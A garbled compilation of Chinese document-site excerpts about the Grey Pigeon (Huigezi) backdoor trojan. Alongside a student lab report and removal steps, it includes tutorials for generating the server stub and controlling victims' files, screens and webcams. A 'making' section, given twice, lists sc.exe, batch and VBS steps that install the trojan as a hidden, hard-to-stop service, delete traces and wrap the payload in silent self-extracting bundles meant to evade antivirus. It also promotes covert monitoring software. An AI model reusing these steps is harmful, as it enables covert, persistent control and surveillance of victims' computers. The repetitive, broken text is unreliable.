关于灰鸽子的原理以及制作和清理
灰鸽子使用教程图解
灰鸽子使用教程图解
(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)
第一部份:网络人远程监控软件
网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。
Netman监控版详细安装方法:
1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program
式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
灰鸽子病毒手工清除方法(图文
灰鸽子病毒手工清除方法
灰鸽子(Backdoor.Huigezi)作者现在还没有停止对灰鸽子的开发,再加上有些人为了避开杀毒软件的查杀故意给灰鸽子加上各种不同的壳,造成现在网络上不断有新的灰鸽子变种出现。尽管瑞星公司一直在不遗余力地收集最新的灰鸽子样本,但由于变种繁多,还会有一些“漏网之鱼”。如果您的机器出现灰鸽子症状但用瑞星杀毒软件查不到,那很可能是中了还没有被截获的新变种。这个时候,就需要手工杀掉灰鸽子。
手工清除灰鸽子并不难,重要的是我们必须懂得它的运行原理。
灰鸽子的运行原理
灰鸽子木马分两部分:客户端和服务端。黑客(姑且这么称呼吧)操纵着客户端,利用客户端配置生成出一个服务端程序。服务端文件的名字默认为
G_Server.exe,然后黑客通过各种渠道传播这个木马(俗称种木马或者开后门)。种木马的手段有很多,比如,黑客可以将它与一张图片绑定,然后假冒成一个羞涩的MM通过QQ把木马传给你,诱骗你运行;也可以建立一个个人网页,诱骗你点击,利用IE漏洞把木马下载到你的机器上并运行;还可以将文件上传到某个软件下载站点,冒充成一个有趣的软件诱骗用户下载……
G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录),然后再从体内释放
G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、
G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,有些灰鸽子会多释放出一个名为 G_ServerKey.dll的文件用来记录键盘操作。注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为 A.exe时,生成的文件就是A.exe、A.dll和A_Hook.dll。
灰鸽子病毒检测及清除的手段方法
灰鸽子病毒 是一个免杀的远程控制软件,但是作为病毒使用也很方便 一、灰鸽子病毒详细简介 灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此我们只能进行简要介绍。 灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。 服务端对客户端连接方式有多种,使得处于各种网络环境的用户都可能中毒,包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。 下面介绍灰鸽子服务端: 配置出来的服务端文件文件名为G_Server.exe(这是默认的,当然也可以改变)。然后黑客利用一切办法诱骗用户运行G_Server.exe程序。具体采用什么办法,读者可以充分发挥想象力,这里就不赘述。 G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子的文件、服务的注册表项,甚至是进程中的模块名。截获的函数主要是用来遍历文件、遍历注册表项和遍历进程模块的一些函数。所以,有些时候用户感觉种了毒,但仔细检查却又发现不了什么异常。有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe时,生成的文件就是A.exe、A.dll和A_Hook.dll。 Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll文件实现后门功能,与控制端客户端进行通信;G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此,中毒后,我们
(整理)灰鸽子远程控制完整详细教程
灰鸽子远程控制完整详细教程
(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)
第一部份:网络人远程监控软件
Netman监控版详细安装方法:
1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码,可点击“选项”-“修改密码”。
灰鸽子使用教程
灰鸽子使用教程
灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此我们只能进行简要介绍。
灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。
连接密码的设定使得灰鸽子服务端程序只能被配置它的黑客控制,避免了黑客之间的竞争。
服务端对客户端连接方式有多种,使得处于各种网络环境的用户都可能中毒,包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。
只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成。
支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!
可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持
Windows9x/ME/2000/Xp/2003。便于黑客进行跳板攻击。
除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。
[专题]“灰鸽子”病毒代码的特点和关键技术解析
![[专题]“灰鸽子”病毒代码的特点和关键技术解析](https://img.taocdn.com/s3/m/d87531382bf90242a8956bec0975f46527d3a7c0.png)
“灰鸽子”病毒代码的特点和关键技术解析
一、“灰鸽子”病毒概述
灰鸽子是国内一款著名后门,比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。
灰鸽子客户端和服务端都是采用Delphi编写,黑客利用客户端程序配置出服务端程序。服务端对客户端连接方式有多种,使得处于各种网络环境的用户都可能中毒,包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。
灰鸽子英文名为W in32.Hack.Huigez,这个木马黑客工具大致于2001年出现在互联网,当时被判定为高危木马。灰鸽子病毒危害程度非常大,是熊猫烧香的10倍以上,灰鸽子病毒集中爆发,据推算,有2000万台电脑可能被控制,而黑客随之买卖控制权,月入上万元。
经过其作者不懈努力,该病毒从2004年起连续五年荣登国内10大病毒排行榜,至今已经衍生出超过10万个变种。
二、“灰鸽子”的关键技术
1.植入技术
灰鸽子植入是灰鸽子攻击目标系统最关键的一步,是后续攻击活动的基础。当前,灰鸽子的植入方法可以分为两大类,即被动植入和主动植入。被动植入是指通过人工干预方式才能将灰鸽子程序安装到目标系统中,植入过程必须依赖于受害用户的手工操作;而主动植入则是指主动攻击方法,是将灰鸽子程序通过程序自动安装到目标系统中,植入过程无需受害用户的操作。被动植入主要通过社会工程方法将灰鸽子程序伪装成合法的,以达到降低受害用户警觉性,诱骗用户的目的。
什么是灰鸽子病毒
什么是灰鸽子病毒
关于什么是灰鸽子病毒
灰鸽子(Hack. Huigezi)是一个集多种控制方法于一体的木马病毒,一旦用户电脑不幸感染,可以说用户的一举一动都在黑客的监控之下,要窃取账号、密码、照片、重要文件都轻而易举。更甚的是,他们还可以连续捕获远程电脑屏幕,还能监控被控电脑上的摄像头,自动开机(不开显示器)并利用摄像头进行录像。截至2006年底,“灰鸽子”木马已经出现了6万多个变种。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。
病毒简介
(1)。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此我们只能进行简要介绍。
灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的`信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。
服务端对客户端连接方式有多种,使得处于各种网络环境的用户都可能中毒,包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。
因涉及互联网安全法律纠纷问题,自2007年3月21日起灰鸽子已全面停止开发和注册。互联网上现存灰鸽子版本为以前所开发灰鸽子软件及其修改版。
灰鸽子处理
灰鸽子是国内一款著名后门程序。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门程序都相形见绌。如果使用在合法的情况下,灰鸽子将是一款优秀的远程控制软件。如果拿他去做一些非法的事,灰鸽子就成了强大的黑客工具。
1、在控制端生成灰鸽子木马服务器端程序
(1)双击启动灰鸽子客户端,如图3.1所示:
图3.1灰鸽子客户端
(2)单击“配置服务程序”,为被控制端生成服务器安装程序。设置通知IP(灰鸽子客户端所在计算机的IP)和保存路径。如图3.2所示:
图3.2 配置服务程序
(3)单击右下角的“生成服务器”,将会生成“Server_setup.exe”文件。
2、在被控端计算机上安装灰鸽子木马服务器端程序
(1)将生成的“Server_setup.exe”文件上传或复制到被控计算机中。
(2)运行服务器端安装程序“Server_setup.exe”文件。
3、在主控机上利用灰鸽子远程控制被控机
(1)在主控机上运行灰鸽子程序。
(2)在“自动上线”列表中对应计算机下即可看到被控机的全部硬盘数据。如图3.3所示:
图3.3 查看被控计算机的信息
(3)可以随意打开一个文件夹,随意的进行删除、移动或者复制、粘贴等操作。
(4)还可以启动或停止被控计算机的服务,或修改其注册表。如图 3.4和图3.5所示:
图3.4 启动或停止被控计算机的服务
图3.5 查看被控计算机的注册表信息
(5)通过单击工具栏的“屏幕控制”,打开被控端的桌面,监视被控端桌面上的任何操作。
4、手动清除灰鸽子
因为灰鸽子的威力很大,如果使用不当会给公司的网络造成很大的危害。下面具体讲解如何通过手动方式来清除灰鸽子:
灰鸽子原理及技术分析
一禁用系统恢复
使用组策略编辑器
1. 单击开始,单击运行,键入gpedit.msc,然后单击确定。
2. 展开“计算机配置”,展开“管理模板”,展开“系统”,然后单击系统恢复。
3. 双击“关闭系统恢复”,然后在设置选项卡上,选择禁用。
4. 双击“关闭配置”,然后在设置选项卡上,选择启用。
有关这些设置的作用的详细信息,请在单击属性对话框上的解释选项卡。
5. 单击应用,然后单击确定。
二升级病毒定义库
Symantec 可LIVEUPDA TE,NORTON也能吧
三在安全模式扫描,并删除感染文件
操作后可离开安全模式,跳到四
四删除注册表键值
Symantec强烈建译备份注册表.
click 开始>运行-- 输入regedit,确定后进入
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Connection Wizard
删除右侧值: "Compleated" = "1"
再进入,删除下列键(key)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\GrayPigeonServer
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_GRAYPIGEONSERVER
离开注册表编辑器
五查找并停止服务
click 开始>运行-- 输入services.msc,确定后进入
定位并选择探测到的Trojan.Feutel服务
点吉动作(Action)>属性(Properties),点吉停止
灰鸽子清除
“灰鸽子”木马手动清除
“灰鸽子”(Backdoor.GPigeon.gen)是一个极具破坏力的木马病毒,它可以使中毒电脑被黑客远程控制、记录键盘操作、中止运行中的进程、强制重新启动计算机等,并且拥有多个变种,是 2005-2006 年度发作最为严重的病毒之一。清除“灰鸽子”最好借助可以随时升级病毒库的杀毒软件,或者各大杀毒软件厂商提供的“灰鸽子”专杀工具。但如果一时没有杀毒软件可用,则只能手动清除病毒。从瑞星网站上转载一篇手动清除“灰鸽子”木马病毒的方法:
1.删除“灰鸽子”建立的系统服务:
“灰鸽子”后门程序会将其自身注册为系统服务,在通常情况下无法看到“灰鸽子”生成的文件、进程以及服务和注册表信息。若要删除它们,首先必须删除“灰鸽子”注册的系统服务。以安全模式启动 Windows,打开注册表编辑器,定位到:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SVCH0ST.EXE(这里的
SVCH0ST 是数字 0,而不是英文字母 o),在这个注册表项中找到 ImagePath 字符串值,如果其值显示为 %SystemRoot%\GServer.EXE,则为“灰鸽子”注册的系统服务。将
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SVCH0ST.EXE 直接删除,即可删除“灰鸽子”注册的系统服务。
2.删除“灰鸽子”文件:
修改注册表后重新启动 Windows,“灰鸽子”注册的系统服务已经被删除,因此可以直接查看到“灰鸽子”病毒文件了,即 %SystemRoot%\GServer.EXE,将其删除。如果依然看不到此文件,可在控制面板中打开“文件夹选项”,在“查看”选项卡中选择“显示所有文件夹和文件”,并取消“隐藏受保护的系统文件(推荐)”这一项即可。
灰鸽子木马原理
灰鸽子木马原理
灰鸽子木马原理
灰鸽子木马是一种常见的网络攻击手段,它的原理是通过植入恶意代码,控制被攻击计算机的行为,从而达到攻击者的目的。下面将详细
介绍灰鸽子木马的原理。
1. 植入恶意代码
灰鸽子木马的第一步是植入恶意代码。攻击者可以通过各种方式将恶
意代码植入到目标计算机中,比如通过电子邮件、网络钓鱼等方式。
一旦恶意代码被植入到计算机中,它就会开始执行攻击者的指令。
2. 控制被攻击计算机
一旦恶意代码被植入到计算机中,攻击者就可以通过远程控制的方式
控制被攻击计算机的行为。攻击者可以利用被攻击计算机的资源,比
如计算能力、存储空间等,进行各种恶意活动,比如发起DDoS攻击、窃取敏感信息等。
3. 隐藏行踪
为了避免被发现,攻击者通常会采取一些措施来隐藏自己的行踪。比如,他们可能会使用代理服务器或虚拟专用网络(VPN)来隐藏自己的IP地址,或者使用加密技术来保护通信内容,使其难以被监测和识别。
总之,灰鸽子木马是一种非常危险的网络攻击手段,它可以给受害者带来严重的损失。为了保护自己的计算机安全,我们应该时刻保持警惕,不要轻易打开来路不明的邮件和链接,同时也要安装好杀毒软件和防火墙,及时更新系统和软件补丁,以提高自己的计算机安全防护能力。
手工清除灰鸽子有什么方法
手工清除灰鸽子有什么方法
当你的电脑中了灰鸽子电脑病毒时,你会怎么办,没事不要紧的!下面由店铺给你做出详细的手工清除灰鸽子方法介绍!希望对你有帮助!
手工清除灰鸽子方法介绍:
当我运行那个文件时,KV杀毒软件就弹出了告警窗口
木马被隔离
为什么到这时才发现呢?因为这种木马采用了“组装合成法”,就是把一个合法的程序和一个木马绑定,当运行合法程序时,木马就自动加载,同时,由于绑定后木马的代码发生了变化,根据特征码扫描的杀毒软件是很难查出来的。这也就是我中招的原因。
一波三折
中了木马,就要想办法清除它。这个木马已被KV“禁用”,无法与远程的木马客户端进行通信。单从这个角度讲,如果不去管它,也无大碍。可每次启动电脑KV就报告,让人整天提心吊胆,并且我的Maxthon浏览器每次关闭网页窗口,都要弹出“error”提示,这种情况以前从未发生过,显然是这个木马搞的鬼!
怎么办呢?因为是实验室的电脑,光驱和软驱被拆掉了,不支持U 盘启动,也没有做过Ghost备份,所以既进入不了DOS,也无法用Ghost备份来恢复。我决定先试试在Win2000中能否用KV将木马清除掉,可当KV查到Winserverhook.dll时,电脑就自动关机重启了,而且启动后要蓝屏查硬盘!随后通过多次试验发现,用KV2004去查,不论是杀毒状态、查毒状态还是询问状态,只要一查到winServerHook.Dll这个文件,电脑就立刻重启。而且也无法复制、剪切、删除和修改winServerHook.Dll这个文件。这使我愈发相信,winServerHook.Dll是个重要的、开机就要调入内存的系统动态链接库(后来的事实证明,这是这个木马最容易让人上当之处!)。
网络安全-木马-灰鸽子种植
实验名称:第五次木马xxxxxxxxx
姓名:xxx
学号:xxxxxxxxx
班级:xxxxxxxxxx
指导老师:xxxxx
(1)实验目的与要求
灰鸽子木马是网络上常见的并且功能强大的远程后
门软件。采用dll注入技术,开启服务程序,从而实
现远程控制的目的。本实验以灰鸽子木马为例进行木
马的制作、种植和攻击。
(2)实验平台及环境
本地主机(WindowsXP)、Windows实验台,灰鸽子客
户端软件。
(3)实验原理
主程序有两个,一个是服务端,另一个是控制端。服
务端需要在主机执行。
当控制端连接服务端主机后,控制端会向服务端主机
发出命令。而服务端主机在接受命令后,会执行相应
的任务。
灰鸽子是国内一款著名后门软件,是国内后门软件的
集大成者。具有丰富而强大的功能、灵活多变的操作、
良好的隐藏性。客户端简易便捷的操作使刚入门的初
学者都能充当黑客。当使用在合法情况下时,灰鸽子
是一款优秀的远程控制软件。但如果拿它做一些非法
的事,灰鸽子就成了很强大的黑客工具。
(4)实验方法与步骤
(5)实验结果及分析
可以通过文件管理、远程控制命令、注册表编辑器和命令广播对远程的主机进行操作。
(6)实验总结
提交木马植入的实现方法和步骤,并分析该方法的隐蔽性和可用性
灰鸽子木马原理
灰鸽子木马原理
灰鸽子木马是一种具有高度隐蔽性和破坏力的恶意软件,其原理基于社会工程学和网络攻击技术。它通过诱骗用户点击伪装成正常文件或链接的恶意程序,从而实现对目标系统的入侵和控制。本文将详细介绍灰鸽子木马的原理及其对网络安全的威胁。
一、灰鸽子木马的传播方式
灰鸽子木马传播的主要方式是通过电子邮件、社交媒体、P2P软件等渠道传播。攻击者会利用社会工程学手段,伪装成可信的来源,诱使用户点击恶意链接或下载恶意附件。一旦用户受骗,恶意软件便会悄无声息地运行在用户的计算机上。
二、灰鸽子木马的工作原理
灰鸽子木马的工作原理可以分为三个主要阶段:潜伏、入侵和控制。
1. 潜伏阶段:灰鸽子木马首先潜伏在目标系统中,它会自动在系统中创建隐藏的文件和注册表项,以保证自身的持久性。在这个阶段,灰鸽子木马会尽可能地隐藏自己,避免被用户或防病毒软件发现。
2. 入侵阶段:一旦潜伏成功,灰鸽子木马将利用漏洞或弱密码等方式入侵目标系统。它会通过网络传输协议与控制服务器建立连接,获取控制指令并执行。攻击者可以通过灰鸽子木马远程控制目标系统,窃取敏感信息或进行其他恶意活动。
3. 控制阶段:在控制阶段,攻击者可以远程操控被感染的系统,执行各种指令。他们可以窃取用户的个人信息、银行账户密码等敏感数据,也可以利用被感染的计算机进行DDoS攻击、发送垃圾邮件等恶意行为。
三、灰鸽子木马对网络安全的威胁
灰鸽子木马作为一种高级威胁,给网络安全带来严重威胁。
1. 用户隐私泄露:灰鸽子木马可以窃取用户的个人信息、登录凭证、银行卡信息等敏感数据,从而导致用户隐私泄露和财产损失。
灰鸽子教程
准备工具:鸽子服务端IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar程序特点:自解压形式,双击即可制作过程:1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。其他的随你个人爱好。2.用SC创建一个服务 运行CMD.EXE 在system32的目录下运行执行 SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为 own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。sc.exe descript_ion huigezi "不死鸽子"‘这句是将huigezi服务的描述改为“不死鸽子”sc config wuauserv depend= huigezi‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg4.创建一个BAT文件,并命名为update.bat @regedit /s %systemroot%\system32\1.reg@%systemroot%\system32\gezi.exe@del /q /f /s %systemroot%\system32\1.reg@del /q /f /s %systemroot%\system32\Update.vbs@del /q /f /s %systemroot%\system32\Update.bat5.创建一个vbs并命名为update.vbs目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。里面写上如下代码:On Error Resume Nextset wshshell=createobject ("wscript_.shell")a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE)6.用我门配置出来的服务端,并命名为run.exe,用run.exe做一个自解压文件,并命名为gezi.exe.。记得将解压模式为全部隐藏.解压后运行run.exe,当然你的服务端要自己做免杀,这里我就不多说了。八仙过海....7.将gezi.exe 1.reg Update.vbs Update.bat 再用winrar制作一个自解压文件,解压到%systemroot%\system32\ 解压后运行Update.vbs当然解压模式依旧全部隐藏,替换同名文件现在用rar捆绑出来的文件很多杀软都不杀,你也可以用系统自带的捆绑机,或其他的捆绑机这个方法可以用到其他的木马中捆出来的自解压文件也可以自己再加工:去掉右键用"winrar打开" 灰鸽子第一章:软件相关介绍:灰鸽子 [VIP 专业版]1.只用一个端口来传输
灰鸽子木马原理
灰鸽子木马原理
一、什么是灰鸽子木马
灰鸽子木马是一种具有高度隐蔽性和持久性的远程控制软件。它通常通过钓鱼邮件、恶意下载和网络漏洞利用等方式传播,目的是植入受害者计算机系统,并使黑客能够远程控制和监控计算机。灰鸽子木马得名于它使用灰鸽子作为其标志性图标。
二、灰鸽子木马的传播方式
1.钓鱼邮件:黑客通过发送看似合法和诱人的邮件,含有携带灰鸽子木马的附
件或恶意链接。当受害者打开附件或点击链接时,木马会悄悄地进入系统。2.恶意下载:黑客会在一些不安全的网站上发布包含恶意代码的软件或文件。
当用户在这些网站上下载并安装软件时,木马就会感染受害者的计算机系统。
3.网络漏洞利用:黑客会利用已知的系统漏洞来传播灰鸽子木马。他们通过扫
描网络,寻找可利用的漏洞,并通过这些漏洞远程感染受害者的计算机。
三、灰鸽子木马的工作原理
灰鸽子木马主要包括三个核心部分:客户端程序、服务器端程序和控制面板。
1.客户端程序:客户端程序是指感染了受害者计算机的木马程序。一旦成功感
染,客户端程序便开始在计算机中植入和运行。它通过窃取敏感信息或监控
用户行为来完成黑客的意图。
2.服务器端程序:服务器端程序是黑客控制灰鸽子木马的中央管理系统。黑客
使用服务器端程序来监控和控制感染了客户端程序的计算机。
3.控制面板:控制面板是黑客使用的用户界面,它允许黑客查看和操纵感染了
灰鸽子木马的客户端计算机。通过控制面板,黑客可以发送指令、收集信息
和执行各种操作。
灰鸽子木马主要通过以下方式实现远程操控和监控:
1.启动自动运行:灰鸽子木马会在感染计算机时添加自启动项,确保在计算机
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
“灰鸽子”攻击原理以及制作和清理
院别计算机科学与通信工程学院专业计算机科学与技术
班级学号4090511
姓名唐盼
指导教师曲荣欣
成绩
2012年 6 月7 日
“灰鸽子”攻击原理以及制作和清理
一.灰鸽子简介:
“灰鸽子”是一种远程控制软件. 最早出现的时候是在模仿前辈“冰河”。“灰鸽子”在2001年出现的,采用Delphi编写,最早并未以成品方式发布,更多的是以技术研究的姿态,采用了源码共享的方式出现在互联网,导致”灰鸽子”迅速发展起来.并且出现了多种不同的版本. “灰鸽子”在出现的时候使用了当时讨论最多的“反弹端口”连接方式,用以躲避大多数个人网络防火墙的拦截。由于服务端都以隐藏方式启动,就奠定了其恶意后门木马的地位.
而我个人就是高中时候,在”灰鸽子”最盛行和风靡的时候,开始认识”灰鸽子”和关注网络安全这个话题.这也是我最早认识和接触到一种黑客软件.在伴随着”灰鸽子”的盛行发展的同时,自己的对网络互联网安全问题的兴趣也随着同步提高.在有关黑客攻击和防范领域过程中享受这种成就感.但是对于”灰鸽子”的了解大多都是来自于<<电脑报>>,<<电脑爱好者>>这些杂志.没有深入了学习.但是”灰鸽子”这个概念却深入脑海.一直伴随我成长到如今.如今虽然”灰鸽子”已经不再流行,但是这个在我心底有着深刻影响的软件,已然成了一个黑客软件的代名词.
二,灰鸽子基本原理:
“灰鸽子”客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。
客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。
服务端配置出来的服务端文件文件名为G_Server.exe(这是默认的,当然也可以改变)。然后黑客利用一切办法诱骗用户运行G_Server.exe程序。
G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录,不支持win7系统.在win7做实验没有成功.生成的服务端不能在win7环境下运行).然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端, G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子的文件、服务的注册表项,甚至是进程中的模块名。截获的函数主要是用来遍历文件、遍历注册表项和遍历进程模块的一些函数。所以,有些时候用户感觉中了毒,但仔细检查却又发现不了什么异常。有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意,
G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe时,生成的文件就是A.exe、A.dll和A_Hook.dll。Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll文件实现后门功能,与控制端客户端进行通信;G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此,中毒后,我们看不到病毒文件,也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同,G_Server_Hook.dll有时候附在Explorer.exe的进程空间中,有时候则是附在所有进程中。
三;灰鸽子制作实例步骤:
准备工具:
灰鸽子服务端; IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar压缩软件用于捆绑生成的程序.
制作过程:
1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。
2.用SC创建一个服务
运行CMD.EXE 在system32的目录下运行执行
SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi".这句是用SC建立一个服务,服务名为huigezi,路径Binpath为
"%systemroot%\system32\gezi.exe",类型type为 own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。
sc.exe descript_ion huigezi "不死鸽子"这句是将huigezi服务的描改为“不死鸽子” sc config wuauserv depend= huigezi配置huigezi使
wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,
这里的wuauserv是系统在Windows Update网站的自动更新服务)。
